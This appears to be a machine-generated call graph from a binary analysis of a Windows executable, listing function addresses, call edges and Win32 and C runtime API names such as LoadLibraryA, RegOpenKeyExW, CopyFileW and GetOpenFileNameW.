59 API calls 102139->102140 102141 83418f 102140->102141 102142 8341a6 102141->102142 102143 834194 102141->102143 102145 7d79f2 59 API calls 102142->102145 102144 7d7cab 59 API calls 102143->102144 102146 8341a1 102144->102146 102147 8341af 102145->102147 102151 7d7b2e 59 API calls 102146->102151 102148 8341cd 102147->102148 102150 7d7cab 59 API calls 102147->102150 102149 7d7b2e 59 API calls 102148->102149 102149->102104 102150->102146 102151->102148 102153 839162 __ftell_nolock 102152->102153 102154 7f0db6 Mailbox 59 API calls 102153->102154 102155 8391bf 102154->102155 102156 7d522e 59 API calls 102155->102156 102157 8391c9 102156->102157 102158 838f5f GetSystemTimeAsFileTime 102157->102158 102159 8391d4 102158->102159 102160 7d4ee5 85 API calls 102159->102160 102161 8391e7 _wcscmp 102160->102161 102162 83920b 102161->102162 102163 8392b8 102161->102163 102466 839734 102162->102466 102165 839734 96 API calls 102163->102165 102180 839284 _wcscat 102165->102180 102168 7d4f0b 74 API calls 102170 8392dd 102168->102170 102169 8392c1 102169->101790 102171 7d4f0b 74 API calls 102170->102171 102173 8392ed 102171->102173 102172 839239 _wcscat _wcscpy 102473 7f40fb 58 API calls __wsplitpath_helper 102172->102473 102174 7d4f0b 74 API calls 102173->102174 102175 839308 102174->102175 102177 7d4f0b 74 API calls 102175->102177 102178 839318 102177->102178 102179 7d4f0b 74 API calls 102178->102179 102181 839333 102179->102181 102180->102168 102180->102169 102182 7d4f0b 74 API calls 102181->102182 102183 839343 102182->102183 102184 7d4f0b 74 API calls 102183->102184 102185 839353 102184->102185 102186 7d4f0b 74 API calls 102185->102186 102187 839363 102186->102187 102436 8398e3 GetTempPathW GetTempFileNameW 102187->102436 102189 83936f 102190 7f525b 115 API calls 102189->102190 102201 839380 102190->102201 102191 83943a 102450 7f53a6 102191->102450 102193 839445 102195 83944b DeleteFileW 102193->102195 102196 83945f 102193->102196 102194 7d4f0b 74 API calls 102194->102201 102195->102169 102197 839505 CopyFileW 102196->102197 102202 839469 _wcsncpy 102196->102202 102198 83951b DeleteFileW 102197->102198 102199 83952d DeleteFileW 102197->102199 102198->102169 102463 8398a2 CreateFileW 102199->102463 102201->102169 102201->102191 102201->102194 102437 7f4863 102201->102437 102474 838b06 116 API calls __fcloseall 102202->102474 102205 8394f0 102205->102199 102207->101716 102208->101752 102209->101765 102259 7d4c03 102210->102259 102213 7d4bdc 102215 7d4bec FreeLibrary 102213->102215 102216 7d4bf5 102213->102216 102214 7d4c03 2 API calls 102214->102213 102215->102216 102217 7f525b 102216->102217 102263 7f5270 102217->102263 102219 7d4dfc 102219->102016 102219->102017 102344 7d4c36 102220->102344 102223 7d4baa 102227 7d4c70 102223->102227 102224 7d4ba1 FreeLibrary 102224->102223 102225 7d4c36 2 API calls 102226 7d4b8f 102225->102226 102226->102223 102226->102224 102228 7f0db6 Mailbox 59 API calls 102227->102228 102229 7d4c85 102228->102229 102230 7d522e 59 API calls 102229->102230 102231 7d4c91 _memmove 102230->102231 102232 7d4d89 102231->102232 102233 7d4dc1 102231->102233 102237 7d4ccc 102231->102237 102348 7d4e89 CreateStreamOnHGlobal 102232->102348 102359 83991b 95 API calls 102233->102359 102234 7d4ec7 69 API calls 102243 7d4cd5 102234->102243 102237->102234 102238 7d4f0b 74 API calls 102238->102243 102239 7d4d69 102239->102025 102241 80d8a7 102242 7d4ee5 85 API calls 102241->102242 102244 80d8bb 102242->102244 102243->102238 102243->102239 102243->102241 102354 7d4ee5 102243->102354 102245 7d4f0b 74 API calls 102244->102245 102245->102239 102247 7d4f1d 102246->102247 102248 80d9cd 102246->102248 102383 7f55e2 102247->102383 102251 839109 102403 838f5f 102251->102403 102253 83911f 102253->102032 102255 80d990 102254->102255 102256 7d4ed6 102254->102256 102408 7f5c60 102256->102408 102258 7d4ede 102260 7d4bd0 102259->102260 102261 7d4c0c LoadLibraryA 102259->102261 102260->102213 102260->102214 102261->102260 102262 7d4c1d GetProcAddress 102261->102262 102262->102260 102265 7f527c __tzset_nolock 102263->102265 102264 7f528f 102312 7f8b28 58 API calls __getptd_noexit 102264->102312 102265->102264 102268 7f52c0 102265->102268 102267 7f5294 102313 7f8db6 9 API calls __mbsnbicoll_l 102267->102313 102282 8004e8 102268->102282 102271 7f52c5 102272 7f52ce 102271->102272 102273 7f52db 102271->102273 102314 7f8b28 58 API calls __getptd_noexit 102272->102314 102275 7f5305 102273->102275 102276 7f52e5 102273->102276 102297 800607 102275->102297 102315 7f8b28 58 API calls __getptd_noexit 102276->102315 102277 7f529f __tzset_nolock @_EH4_CallFilterFunc@8 102277->102219 102283 8004f4 __tzset_nolock 102282->102283 102284 7f9c0b __lock 58 API calls 102283->102284 102295 800502 102284->102295 102285 800576 102317 8005fe 102285->102317 102286 80057d 102322 7f881d 58 API calls 2 library calls 102286->102322 102289 800584 102289->102285 102323 7f9e2b InitializeCriticalSectionAndSpinCount 102289->102323 102290 8005f3 __tzset_nolock 102290->102271 102292 7f9c93 __mtinitlocknum 58 API calls 102292->102295 102294 8005aa EnterCriticalSection 102294->102285 102295->102285 102295->102286 102295->102292 102320 7f6c50 59 API calls __lock 102295->102320 102321 7f6cba LeaveCriticalSection LeaveCriticalSection _doexit 102295->102321 102306 800627 __wopenfile 102297->102306 102298 800641 102328 7f8b28 58 API calls __getptd_noexit 102298->102328 102299 8007fc 102299->102298 102303 80085f 102299->102303 102301 800646 102329 7f8db6 9 API calls __mbsnbicoll_l 102301->102329 102325 8085a1 102303->102325 102304 7f5310 102316 7f5332 LeaveCriticalSection LeaveCriticalSection __wfsopen 102304->102316 102306->102298 102306->102299 102330 7f37cb 60 API calls 2 library calls 102306->102330 102308 8007f5 102308->102299 102331 7f37cb 60 API calls 2 library calls 102308->102331 102310 800814 102310->102299 102332 7f37cb 60 API calls 2 library calls 102310->102332 102312->102267 102313->102277 102314->102277 102315->102277 102316->102277 102324 7f9d75 LeaveCriticalSection 102317->102324 102319 800605 102319->102290 102320->102295 102321->102295 102322->102289 102323->102294 102324->102319 102333 807d85 102325->102333 102327 8085ba 102327->102304 102328->102301 102329->102304 102330->102308 102331->102310 102332->102299 102335 807d91 __tzset_nolock 102333->102335 102334 807da7 102336 7f8b28 __mbsnbicoll_l 58 API calls 102334->102336 102335->102334 102337 807ddd 102335->102337 102338 807dac 102336->102338 102339 807e4e __wsopen_nolock 109 API calls 102337->102339 102340 7f8db6 __mbsnbicoll_l 9 API calls 102338->102340 102341 807df9 102339->102341 102343 807db6 __tzset_nolock 102340->102343 102342 807e22 __wsopen_helper LeaveCriticalSection 102341->102342 102342->102343 102343->102327 102345 7d4b83 102344->102345 102346 7d4c3f LoadLibraryA 102344->102346 102345->102225 102345->102226 102346->102345 102347 7d4c50 GetProcAddress 102346->102347 102347->102345 102349 7d4ea3 FindResourceExW 102348->102349 102353 7d4ec0 102348->102353 102350 80d933 LoadResource 102349->102350 102349->102353 102351 80d948 SizeofResource 102350->102351 102350->102353 102352 80d95c LockResource 102351->102352 102351->102353 102352->102353 102353->102237 102355 7d4ef4 102354->102355 102356 80d9ab 102354->102356 102360 7f584d 102355->102360 102358 7d4f02 102358->102243 102359->102237 102363 7f5859 __tzset_nolock 102360->102363 102361 7f586b 102373 7f8b28 58 API calls __getptd_noexit 102361->102373 102363->102361 102364 7f5891 102363->102364 102375 7f6c11 102364->102375 102365 7f5870 102374 7f8db6 9 API calls __mbsnbicoll_l 102365->102374 102370 7f58a6 102382 7f58c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 102370->102382 102372 7f587b __tzset_nolock 102372->102358 102373->102365 102374->102372 102376 7f6c43 EnterCriticalSection 102375->102376 102377 7f6c21 102375->102377 102379 7f5897 102376->102379 102377->102376 102378 7f6c29 102377->102378 102380 7f9c0b __lock 58 API calls 102378->102380 102381 7f57be 83 API calls 4 library calls 102379->102381 102380->102379 102381->102370 102382->102372 102386 7f55fd 102383->102386 102385 7d4f2e 102385->102251 102387 7f5609 __tzset_nolock 102386->102387 102388 7f561f _memset 102387->102388 102389 7f564c 102387->102389 102398 7f5644 __tzset_nolock 102387->102398 102399 7f8b28 58 API calls __getptd_noexit 102388->102399 102390 7f6c11 __lock_file 59 API calls 102389->102390 102392 7f5652 102390->102392 102401 7f541d 72 API calls 6 library calls 102392->102401 102393 7f5639 102400 7f8db6 9 API calls __mbsnbicoll_l 102393->102400 102396 7f5668 102402 7f5686 LeaveCriticalSection LeaveCriticalSection __wfsopen 102396->102402 102398->102385 102399->102393 102400->102398 102401->102396 102402->102398 102406 7f520a GetSystemTimeAsFileTime 102403->102406 102405 838f6e 102405->102253 102407 7f5238 __aulldiv 102406->102407 102407->102405 102409 7f5c6c __tzset_nolock 102408->102409 102410 7f5c7e 102409->102410 102411 7f5c93 102409->102411 102422 7f8b28 58 API calls __getptd_noexit 102410->102422 102413 7f6c11 __lock_file 59 API calls 102411->102413 102414 7f5c99 102413->102414 102424 7f58d0 67 API calls 5 library calls 102414->102424 102415 7f5c83 102423 7f8db6 9 API calls __mbsnbicoll_l 102415->102423 102418 7f5ca4 102425 7f5cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 102418->102425 102420 7f5cb6 102421 7f5c8e __tzset_nolock 102420->102421 102421->102258 102422->102415 102423->102421 102424->102418 102425->102420 102426->102081 102428 7d7a5f 102427->102428 102432 7d7a85 _memmove 102427->102432 102429 7f0db6 Mailbox 59 API calls 102428->102429 102428->102432 102430 7d7ad4 102429->102430 102431 7f0db6 Mailbox 59 API calls 102430->102431 102431->102432 102432->102095 102433->102094 102434->102137 102435->102139 102436->102189 102438 7f486f __tzset_nolock 102437->102438 102439 7f488d 102438->102439 102440 7f48a5 102438->102440 102442 7f489d __tzset_nolock 102438->102442 102487 7f8b28 58 API calls __getptd_noexit 102439->102487 102443 7f6c11 __lock_file 59 API calls 102440->102443 102442->102201 102445 7f48ab 102443->102445 102444 7f4892 102488 7f8db6 9 API calls __mbsnbicoll_l 102444->102488 102475 7f470a 102445->102475 102451 7f53b2 __tzset_nolock 102450->102451 102452 7f53de 102451->102452 102453 7f53c6 102451->102453 102456 7f6c11 __lock_file 59 API calls 102452->102456 102460 7f53d6 __tzset_nolock 102452->102460 102666 7f8b28 58 API calls __getptd_noexit 102453->102666 102455 7f53cb 102667 7f8db6 9 API calls __mbsnbicoll_l 102455->102667 102458 7f53f0 102456->102458 102650 7f533a 102458->102650 102460->102193 102469 839748 __tzset_nolock _wcscmp 102466->102469 102467 839109 GetSystemTimeAsFileTime 102467->102469 102468 839210 102468->102169 102472 7f40fb 58 API calls __wsplitpath_helper 102468->102472 102469->102467 102469->102468 102470 7d4f0b 74 API calls 102469->102470 102471 7d4ee5 85 API calls 102469->102471 102470->102469 102471->102469 102472->102172 102473->102180 102474->102205 102477 7f4719 102475->102477 102481 7f4737 102475->102481 102476 7f4727 102525 7f8b28 58 API calls __getptd_noexit 102476->102525 102477->102476 102477->102481 102485 7f4751 _memmove 102477->102485 102479 7f472c 102489 7f48dd LeaveCriticalSection LeaveCriticalSection __wfsopen 102481->102489 102485->102481 102490 7f46e6 102485->102490 102497 7fd886 102485->102497 102527 7f4a3d 102485->102527 102533 7fae1e 78 API calls 6 library calls 102485->102533 102487->102444 102488->102442 102489->102442 102491 7f4705 102490->102491 102492 7f46f0 102490->102492 102491->102485 102498 7fd892 __tzset_nolock 102497->102498 102525->102479 102528 7f4a50 102527->102528 102532 7f4a74 102527->102532 102529 7f46e6 __ftell_nolock 58 API calls 102528->102529 102528->102532 102532->102485 102533->102485 102651 7f535d 102650->102651 102652 7f5349 102650->102652 102654 7f4a3d __flush 78 API calls 102651->102654 102659 7f5359 102651->102659 102699 7f8b28 58 API calls __getptd_noexit 102652->102699 102656 7f5369 102654->102656 102655 7f534e 102669 800b77 102656->102669 102668 7f5415 LeaveCriticalSection LeaveCriticalSection __wfsopen 102659->102668 102666->102455 102667->102460 102668->102460 102699->102655 102739->101815 102740->101803 102741->101818 102742->101816 102743->101820 102744->101830 102745->101832 102746->101836 102747->101663 102748->101661 102749->101547 102750->101561 102751 7d1055 102756 7d2649 102751->102756 102754 7f2d40 __cinit 67 API calls 102755 7d1064 102754->102755 102757 7d7667 59 API calls 102756->102757 102758 7d26b7 102757->102758 102763 7d3582 102758->102763 102761 7d2754 102762 7d105a 102761->102762 102766 7d3416 59 API calls 2 library calls 102761->102766 102762->102754 102767 7d35b0 102763->102767 102766->102761 102768 7d35bd 102767->102768 102770 7d35a1 102767->102770 102769 7d35c4 RegOpenKeyExW 102768->102769 102768->102770 102769->102770 102771 7d35de RegQueryValueExW 102769->102771 102770->102761 102772 7d35ff 102771->102772 102773 7d3614 RegCloseKey 102771->102773 102772->102773 102773->102770 102774 7f7c56 102775 7f7c62 __tzset_nolock 102774->102775 102811 7f9e08 GetStartupInfoW 102775->102811 102777 7f7c67 102813 7f8b7c GetProcessHeap 102777->102813 102779 7f7cbf 102780 7f7cca 102779->102780 102896 7f7da6 58 API calls 3 library calls 102779->102896 102814 7f9ae6 102780->102814 102783 7f7cd0 102784 7f7cdb __RTC_Initialize 102783->102784 102897 7f7da6 58 API calls 3 library calls 102783->102897 102835 7fd5d2 102784->102835 102787 7f7cea 102788 7f7cf6 GetCommandLineW 102787->102788 102898 7f7da6 58 API calls 3 library calls 102787->102898 102854 804f23 GetEnvironmentStringsW 102788->102854 102791 7f7cf5 102791->102788 102794 7f7d10 102795 7f7d1b 102794->102795 102899 7f30b5 58 API calls 3 library calls 102794->102899 102864 804d58 102795->102864 102798 7f7d21 102799 7f7d2c 102798->102799 102900 7f30b5 58 API calls 3 library calls 102798->102900 102878 7f30ef 102799->102878 102802 7f7d34 102803 7f7d3f __wwincmdln 102802->102803 102901 7f30b5 58 API calls 3 library calls 102802->102901 102884 7d47d0 102803->102884 102806 7f7d53 102807 7f7d62 102806->102807 102902 7f3358 58 API calls _doexit 102806->102902 102903 7f30e0 58 API calls _doexit 102807->102903 102810 7f7d67 __tzset_nolock 102812 7f9e1e 102811->102812 102812->102777 102813->102779 102904 7f3187 36 API calls 2 library calls 102814->102904 102816 7f9aeb 102905 7f9d3c InitializeCriticalSectionAndSpinCount __getstream 102816->102905 102818 7f9af0 102819 7f9af4 102818->102819 102907 7f9d8a TlsAlloc 102818->102907 102906 7f9b5c 61 API calls 2 library calls 102819->102906 102822 7f9af9 102822->102783 102823 7f9b06 102823->102819 102824 7f9b11 102823->102824 102908 7f87d5 102824->102908 102827 7f9b53 102916 7f9b5c 61 API calls 2 library calls 102827->102916 102830 7f9b58 102830->102783 102831 7f9b32 102831->102827 102832 7f9b38 102831->102832 102915 7f9a33 58 API calls 4 library calls 102832->102915 102834 7f9b40 GetCurrentThreadId 102834->102783 102836 7fd5de __tzset_nolock 102835->102836 102837 7f9c0b __lock 58 API calls 102836->102837 102838 7fd5e5 102837->102838 102839 7f87d5 __calloc_crt 58 API calls 102838->102839 102841 7fd5f6 102839->102841 102840 7fd661 GetStartupInfoW 102844 7fd7a5 102840->102844 102848 7fd676 102840->102848 102841->102840 102842 7fd601 __tzset_nolock @_EH4_CallFilterFunc@8 102841->102842 102842->102787 102843 7fd86d 102930 7fd87d LeaveCriticalSection _doexit 102843->102930 102844->102843 102847 7fd7f2 GetStdHandle 102844->102847 102850 7fd805 GetFileType 102844->102850 102929 7f9e2b InitializeCriticalSectionAndSpinCount 102844->102929 102846 7f87d5 __calloc_crt 58 API calls 102846->102848 102847->102844 102848->102844 102848->102846 102849 7fd6c4 102848->102849 102849->102844 102851 7fd6f8 GetFileType 102849->102851 102928 7f9e2b InitializeCriticalSectionAndSpinCount 102849->102928 102850->102844 102851->102849 102855 7f7d06 102854->102855 102856 804f34 102854->102856 102860 804b1b GetModuleFileNameW 102855->102860 102931 7f881d 58 API calls 2 library calls 102856->102931 102858 804f5a _memmove 102859 804f70 FreeEnvironmentStringsW 102858->102859 102859->102855 102861 804b4f _wparse_cmdline 102860->102861 102863 804b8f _wparse_cmdline 102861->102863 102932 7f881d 58 API calls 2 library calls 102861->102932 102863->102794 102865 804d71 __wsetenvp 102864->102865 102869 804d69 102864->102869 102866 7f87d5 __calloc_crt 58 API calls 102865->102866 102874 804d9a __wsetenvp 102866->102874 102867 804df1 102868 7f2d55 _free 58 API calls 102867->102868 102868->102869 102869->102798 102870 7f87d5 __calloc_crt 58 API calls 102870->102874 102871 804e16 102872 7f2d55 _free 58 API calls 102871->102872 102872->102869 102874->102867 102874->102869 102874->102870 102874->102871 102875 804e2d 102874->102875 102933 804607 58 API calls __mbsnbicoll_l 102874->102933 102934 7f8dc6 IsProcessorFeaturePresent 102875->102934 102877 804e39 102877->102798 102879 7f30fb __IsNonwritableInCurrentImage 102878->102879 102949 7fa4d1 102879->102949 102881 7f3119 __initterm_e 102882 7f2d40 __cinit 67 API calls 102881->102882 102883 7f3138 __cinit __IsNonwritableInCurrentImage 102881->102883 102882->102883 102883->102802 102885 7d47ea 102884->102885 102895 7d4889 102884->102895 102886 7d4824 IsThemeActive 102885->102886 102952 7f336c 102886->102952 102890 7d4850 102964 7d48fd SystemParametersInfoW SystemParametersInfoW 102890->102964 102892 7d485c 102965 7d3b3a 102892->102965 102894 7d4864 SystemParametersInfoW 102894->102895 102895->102806 102896->102780 102897->102784 102898->102791 102902->102807 102903->102810 102904->102816 102905->102818 102906->102822 102907->102823 102911 7f87dc 102908->102911 102910 7f8817 102910->102827 102914 7f9de6 TlsSetValue 102910->102914 102911->102910 102913 7f87fa 102911->102913 102917 8051f6 102911->102917 102913->102910 102913->102911 102925 7fa132 Sleep 102913->102925 102914->102831 102915->102834 102916->102830 102918 805201 102917->102918 102923 80521c 102917->102923 102919 80520d 102918->102919 102918->102923 102926 7f8b28 58 API calls __getptd_noexit 102919->102926 102920 80522c HeapAlloc 102922 805212 102920->102922 102920->102923 102922->102911 102923->102920 102923->102922 102927 7f33a1 DecodePointer 102923->102927 102925->102913 102926->102922 102927->102923 102928->102849 102929->102844 102930->102842 102931->102858 102932->102863 102933->102874 102935 7f8dd1 102934->102935 102940 7f8c59 102935->102940 102939 7f8dec 102939->102877 102941 7f8c73 _memset __call_reportfault 102940->102941 102942 7f8c93 IsDebuggerPresent 102941->102942 102948 7fa155 SetUnhandledExceptionFilter UnhandledExceptionFilter 102942->102948 102944 7fc5f6 __except_handler4 6 API calls 102945 7f8d7a 102944->102945 102947 7fa140 GetCurrentProcess TerminateProcess 102945->102947 102946 7f8d57 __call_reportfault 102946->102944 102947->102939 102948->102946 102950 7fa4d4 EncodePointer 102949->102950 102950->102950 102951 7fa4ee 102950->102951 102951->102881 102953 7f9c0b __lock 58 API calls 102952->102953 102954 7f3377 DecodePointer EncodePointer 102953->102954 103017 7f9d75 LeaveCriticalSection 102954->103017 102956 7d4849 102957 7f33d4 102956->102957 102958 7f33de 102957->102958 102959 7f33f8 102957->102959 102958->102959 103018 7f8b28 58 API calls __getptd_noexit 102958->103018 102959->102890 102961 7f33e8 103019 7f8db6 9 API calls __mbsnbicoll_l 102961->103019 102963 7f33f3 102963->102890 102964->102892 102966 7d3b47 __ftell_nolock 102965->102966 102967 7d7667 59 API calls 102966->102967 102968 7d3b51 GetCurrentDirectoryW 102967->102968 103020 7d3766 102968->103020 102970 7d3b7a IsDebuggerPresent 102971 80d272 MessageBoxA 102970->102971 102972 7d3b88 102970->102972 102974 80d28c 102971->102974 102972->102974 102975 7d3ba5 102972->102975 103004 7d3c61 102972->103004 102973 7d3c68 SetCurrentDirectoryW 102978 7d3c75 Mailbox 102973->102978 103153 7d7213 59 API calls Mailbox 102974->103153 103101 7d7285 102975->103101 102978->102894 102979 80d29c 102984 80d2b2 SetCurrentDirectoryW 102979->102984 102981 7d3bc3 GetFullPathNameW 102982 7d7bcc 59 API calls 102981->102982 102984->102978 103004->102973 103017->102956 103018->102961 103019->102963 103021 7d7667 59 API calls 103020->103021 103022 7d377c 103021->103022 103155 7d3d31 103022->103155 103024 7d379a 103025 7d4706 61 API calls 103024->103025 103026 7d37ae 103025->103026 103027 7d7de1 59 API calls 103026->103027 103028 7d37bb 103027->103028 103029 7d4ddd 136 API calls 103028->103029 103030 7d37d4 103029->103030 103031 7d37dc Mailbox 103030->103031 103032 80d173 103030->103032 103035 7d8047 59 API calls 103031->103035 103197 83955b 103032->103197 103038 7d37ef 103035->103038 103036 80d192 103037 7f2d55 _free 58 API calls 103036->103037 103040 80d19f 103037->103040 103169 7d928a 103038->103169 103039 7d4e4a 84 API calls 103039->103036 103042 7d4e4a 84 API calls 103040->103042 103044 80d1a8 103042->103044 103048 7d3ed0 59 API calls 103044->103048 103045 7d7de1 59 API calls 103046 7d3808 103045->103046 103047 7d84c0 69 API calls 103046->103047 103049 7d381a Mailbox 103047->103049 103050 80d1c3 103048->103050 103051 7d7de1 59 API calls 103049->103051 103052 7d3ed0 59 API calls 103050->103052 103053 7d3840 103051->103053 103054 80d1df 103052->103054 103055 7d84c0 69 API calls 103053->103055 103056 7d4706 61 API calls 103054->103056 103058 7d384f Mailbox 103055->103058 103057 80d204 103056->103057 103059 7d3ed0 59 API calls 103057->103059 103061 7d7667 59 API calls 103058->103061 103060 80d210 103059->103060 103062 7d8047 59 API calls 103060->103062 103063 7d386d 103061->103063 103064 80d21e 103062->103064 103172 7d3ed0 103063->103172 103066 7d3ed0 59 API calls 103064->103066 103068 80d22d 103066->103068 103074 7d8047 59 API calls 103068->103074 103070 7d3887 103070->103044 103071 7d3891 103070->103071 103072 7f2efd _W_store_winword 60 API calls 103071->103072 103073 7d389c 103072->103073 103073->103050 103075 7d38a6 103073->103075 103076 80d24f 103074->103076 103077 7f2efd _W_store_winword 60 API calls 103075->103077 103079 7d3ed0 59 API calls 103076->103079 103078 7d38b1 103077->103078 103078->103054 103081 7d38bb 103078->103081 103080 80d25c 103079->103080 103080->103080 103082 7f2efd _W_store_winword 60 API calls 103081->103082 103083 7d38c6 103082->103083 103083->103068 103084 7d3907 103083->103084 103085 7d3ed0 59 API calls 103083->103085 103084->103068 103086 7d3914 103084->103086 103087 7d38ea 103085->103087 103088 7d92ce 59 API calls 103086->103088 103089 7d8047 59 API calls 103087->103089 103090 7d3924 103088->103090 103092 7d38f8 103089->103092 103091 7d9050 59 API calls 103090->103091 103093 7d3932 103091->103093 103094 7d3ed0 59 API calls 103092->103094 103188 7d8ee0 103093->103188 103094->103084 103096 7d928a 59 API calls 103098 7d394f 103096->103098 103097 7d8ee0 60 API calls 103097->103098 103098->103096 103098->103097 103099 7d3ed0 59 API calls 103098->103099 103100 7d3995 Mailbox 103098->103100 103099->103098 103100->102970 103102 7d7292 __ftell_nolock 103101->103102 103103 80ea22 _memset 103102->103103 103104 7d72ab 103102->103104 103106 80ea3e GetOpenFileNameW 103103->103106 103105 7d4750 60 API calls 103104->103105 103107 7d72b4 103105->103107 103108 80ea8d 103106->103108 103237 7f0791 103107->103237 103110 7d7bcc 59 API calls 103108->103110 103112 80eaa2 103110->103112 103112->103112 103114 7d72c9 103255 7d686a 103114->103255 103153->102979 103156 7d3d3e __ftell_nolock 103155->103156 103157 7d7bcc 59 API calls 103156->103157 103161 7d3ea4 Mailbox 103156->103161 103159 7d3d70 103157->103159 103158 7d79f2 59 API calls 103158->103159 103159->103158 103168 7d3da6 Mailbox 103159->103168 103160 7d3e77 103160->103161 103162 7d7de1 59 API calls 103160->103162 103161->103024 103164 7d3e98 103162->103164 103163 7d7de1 59 API calls 103163->103168 103166 7d3f74 59 API calls 103164->103166 103165 7d79f2 59 API calls 103165->103168 103166->103161 103167 7d3f74 59 API calls 103167->103168 103168->103160 103168->103161 103168->103163 103168->103165 103168->103167 103170 7f0db6 Mailbox 59 API calls 103169->103170 103171 7d37fb 103170->103171 103171->103045 103173 7d3eda 103172->103173 103174 7d3ef3 103172->103174 103175 7d8047 59 API calls 103173->103175 103176 7d7bcc 59 API calls 103174->103176 103177 7d3879 103175->103177 103176->103177 103178 7f2efd 103177->103178 103179 7f2f7e 103178->103179 103180 7f2f09 103178->103180 103234 7f2f90 60 API calls 3 library calls 103179->103234 103187 7f2f2e 103180->103187 103232 7f8b28 58 API calls __getptd_noexit 103180->103232 103183 7f2f8b 103183->103070 103184 7f2f15 103233 7f8db6 9 API calls __mbsnbicoll_l 103184->103233 103186 7f2f20 103186->103070 103187->103070 103189 80f17c 103188->103189 103193 7d8ef7 103188->103193 103189->103193 103235 7d8bdb 59 API calls Mailbox 103189->103235 103191 7d8ff8 103194 7f0db6 Mailbox 59 API calls 103191->103194 103192 7d9040 103195 7d9d3c 60 API calls 103192->103195 103193->103191 103193->103192 103196 7d8fff 103193->103196 103194->103196 103195->103196 103196->103098 103198 7d4ee5 85 API calls 103197->103198 103199 8395ca 103198->103199 103200 839734 96 API calls 103199->103200 103201 8395dc 103200->103201 103202 7d4f0b 74 API calls 103201->103202 103230 80d186 103201->103230 103203 8395f7 103202->103203 103204 7d4f0b 74 API calls 103203->103204 103205 839607 103204->103205 103206 7d4f0b 74 API calls 103205->103206 103207 839622 103206->103207 103208 7d4f0b 74 API calls 103207->103208 103209 83963d 103208->103209 103210 7d4ee5 85 API calls 103209->103210 103211 839654 103210->103211 103212 7f571c __crtLCMapStringA_stat 58 API calls 103211->103212 103213 83965b 103212->103213 103214 7f571c __crtLCMapStringA_stat 58 API calls 103213->103214 103215 839665 103214->103215 103216 7d4f0b 74 API calls 103215->103216 103217 839679 103216->103217 103218 839109 GetSystemTimeAsFileTime 103217->103218 103219 83968c 103218->103219 103220 8396a1 103219->103220 103221 8396b6 103219->103221 103222 7f2d55 _free 58 API calls 103220->103222 103223 83971b 103221->103223 103224 8396bc 103221->103224 103225 8396a7 103222->103225 103227 7f2d55 _free 58 API calls 103223->103227 103236 838b06 116 API calls __fcloseall 103224->103236 103228 7f2d55 _free 58 API calls 103225->103228 103227->103230 103228->103230 103229 839713 103231 7f2d55 _free 58 API calls 103229->103231 103230->103036 103230->103039 103231->103230 103232->103184 103233->103186 103234->103183 103235->103193 103236->103229 103238 801940 __ftell_nolock 103237->103238 103239 7f079e GetLongPathNameW 103238->103239 103240 7d7bcc 59 API calls 103239->103240 103241 7d72bd 103240->103241 103242 7d700b 103241->103242 103243 7d7667 59 API calls 103242->103243 103244 7d701d 103243->103244 103245 7d4750 60 API calls 103244->103245 103246 7d7028 103245->103246 103247 80e885 103246->103247 103248 7d7033 103246->103248 103253 80e89f 103247->103253 103295 7d7908 61 API calls 103247->103295 103249 7d3f74 59 API calls 103248->103249 103251 7d703f 103249->103251 103289 7d34c2 103251->103289 103254 7d7052 Mailbox 103254->103114 103256 7d4ddd 136 API calls 103255->103256 103257 7d688f 103256->103257 103258 80e031 103257->103258 103260 7d4ddd 136 API calls 103257->103260 103259 83955b 122 API calls 103258->103259 103261 80e046 103259->103261 103262 7d68a3 103260->103262 103263 80e067 103261->103263 103264 80e04a 103261->103264 103262->103258 103265 7d68ab 103262->103265 103267 7f0db6 Mailbox 59 API calls 103263->103267 103266 7d4e4a 84 API calls 103264->103266 103268 80e052 103265->103268 103269 7d68b7 103265->103269 103266->103268 103274 80e0ac Mailbox 103267->103274 103395 8342f8 90 API calls _wprintf 103268->103395 103296 7d6a8c 103269->103296 103273 80e060 103273->103263 103275 80e260 103274->103275 103279 80e271 103274->103279 103280 7d750f 59 API calls 103274->103280 103286 7d7de1 59 API calls 103274->103286 103389 7d735d 103274->103389 103396 82f73d 59 API calls 2 library calls 103274->103396 103397 82f65e 61 API calls 2 library calls 103274->103397 103398 83737f 59 API calls Mailbox 103274->103398 103276 7f2d55 _free 58 API calls 103275->103276 103277 80e268 103276->103277 103278 7d4e4a 84 API calls 103277->103278 103278->103279 103283 7f2d55 _free 58 API calls 103279->103283 103284 7d4e4a 84 API calls 103279->103284 103399 82f7a1 89 API calls 4 library calls 103279->103399 103280->103274 103283->103279 103284->103279 103286->103274 103290 7d34d4 103289->103290 103294 7d34f3 _memmove 103289->103294 103292 7f0db6 Mailbox 59 API calls 103290->103292 103291 7f0db6 Mailbox 59 API calls 103293 7d350a 103291->103293 103292->103294 103293->103254 103294->103291 103295->103247 103297 7d6ab5 103296->103297 103298 80e41e 103296->103298 103405 7d57a6 60 API calls Mailbox 103297->103405 103421 82f7a1 89 API calls 4 library calls 103298->103421 103301 7d6ad7 103406 7d57f6 67 API calls 103301->103406 103302 80e431 103422 82f7a1 89 API calls 4 library calls 103302->103422 103304 7d6aec 103304->103302 103305 7d6af4 103304->103305 103307 7d7667 59 API calls 103305->103307 103309 7d6b00 103307->103309 103308 80e44d 103311 7d6b61 103308->103311 103407 7f0957 60 API calls __ftell_nolock 103309->103407 103313 80e460 103311->103313 103314 7d6b6f 103311->103314 103312 7d6b0c 103316 7d7667 59 API calls 103312->103316 103317 7d5c6f CloseHandle 103313->103317 103315 7d7667 59 API calls 103314->103315 103319 7d6b78 103315->103319 103320 7d6b18 103316->103320 103318 80e46c 103317->103318 103321 7d4ddd 136 API calls 103318->103321 103322 7d7667 59 API calls 103319->103322 103323 7d4750 60 API calls 103320->103323 103324 80e488 103321->103324 103325 7d6b81 103322->103325 103326 7d6b26 103323->103326 103327 80e4b1 103324->103327 103330 83955b 122 API calls 103324->103330 103328 7d459b 59 API calls 103325->103328 103408 7d5850 ReadFile SetFilePointerEx 103326->103408 103423 82f7a1 89 API calls 4 library calls 103327->103423 103331 7d6b98 103328->103331 103334 80e4a4 103330->103334 103335 7d7b2e 59 API calls 103331->103335 103333 7d6b52 103409 7d5aee SetFilePointerEx SetFilePointerEx 103333->103409 103338 80e4ac 103334->103338 103339 80e4cd 103334->103339 103340 7d6ba9 SetCurrentDirectoryW 103335->103340 103336 80e4c8 103368 7d6d0c Mailbox 103336->103368 103341 7d4e4a 84 API calls 103338->103341 103342 7d4e4a 84 API calls 103339->103342 103345 7d6bbc Mailbox 103340->103345 